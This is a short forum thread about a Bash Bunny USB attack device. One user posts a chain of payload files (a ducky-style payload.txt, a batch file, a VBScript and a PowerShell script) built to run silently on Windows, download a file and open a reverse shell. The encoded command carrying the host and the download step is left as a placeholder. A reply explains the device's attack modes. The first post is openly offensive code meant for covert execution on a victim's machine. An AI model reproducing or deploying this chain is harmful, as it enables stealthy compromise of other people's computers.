Babutzc Posted January 6, 2019 Share Posted January 6, 2019 There is something i do not understand while working with the BB. I am trying to make a payload as silent as possible, and i'm sure i'm doing some stuff which isn't really neccesary. The payload down below only works when it's in ATTACKMODE HID STORAGE. Any other ATTACKMODE, it fails to download my file and start a reverse shell. I do not understand why this is, does anyone has a clarification for me? Because i really fail to understand why. Also i'm sure i could spawn a reverse shell with a .exe created by unicorn. payload.txt Quote GET SWITCH_POSITION LED ATTACK ATTACKMODE HID SERIAL RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" LED FINISH d.cmd Quote @echo off cscript %~dp0\i.vbs @exit i.vbs Quote command = "powershell.exe -nologo -WindowStyle hidden -command "%~dp0\shell.ps1" set shell = CreateObject("WScript.Shell") shell.Run command,0 shell.ps1 Quote powershell.exe -nologo -WindowStyle Hidden -encodedCommand <<base64 string with ip and download/execute instructions>> Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted January 7, 2019 Share Posted January 7, 2019 SERIAL attackmode puts the bunny in Serial mode...like a com port. The original payload you posted looks for the Bunny to be mounted as a USB stick (STORAGE). If it is not mounted as storage, there is no drive labeled BASHBUNNY. The only way you will get your files you are accessing with SERIAL is you will have to do it serially. Pretty much have to make a serial server on the BashBunny in Python or whatever to serve/communicate/etc and a serial receiver agent on the victim to receive it to run it. Do not ask how to do it the serial way I mentioned, it is a long topic best self journeyed to understand and involves programming. So, HID puts the BB in keyboard mode, STORAGE puts the BB in USB Storage mode, ECM_ETHERNET puts BB in network mode as a ECM compatible network device (mostly Macs and Linux machines), RNDIS_ETHERNET put the BB in network mode RNDIS driver compatible (mainly Windows machines). Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.